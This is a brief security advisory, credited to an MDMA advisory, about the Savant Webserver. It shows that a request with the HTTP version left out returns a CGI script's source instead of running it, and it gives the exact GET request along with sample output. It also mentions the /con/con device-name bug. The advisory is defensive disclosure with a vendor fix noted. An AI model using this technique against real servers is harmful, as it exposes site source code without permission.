Vulnerability

    Savant Webserver

Affected

    Savant Webserver

Description

    Following  is  based  on  MDMA  Advisory  #5  by Andrew Lewis aka.
    Wizdumb.  It is possible to view the source of CGI scripts running
    under the Savant Webserver by omitting the HTTP version from  your
    request.  For  example, we connect  to port 80  of the server  and
    type "GET /cgi-bin/mdma.bat HTTP/1.0" followed by two enters,  and
    the results are as follows...

        HTTP/1.0 200 OK
        Pragma: no-cache
        Content-type: text/html
        Server: Savant

        phjeeeer

    However, if we just  type "GET /cgi-bin/mdma.bat" followed  by two
    enters, the results are as follows...

        @echo off
        rem CGI Script for demonstrating vulnerability
        echo phjeeeer

    Savant is also affected by the /con/con bug.

Solution

    The vendor has been contacted and a fix is in the pipeline.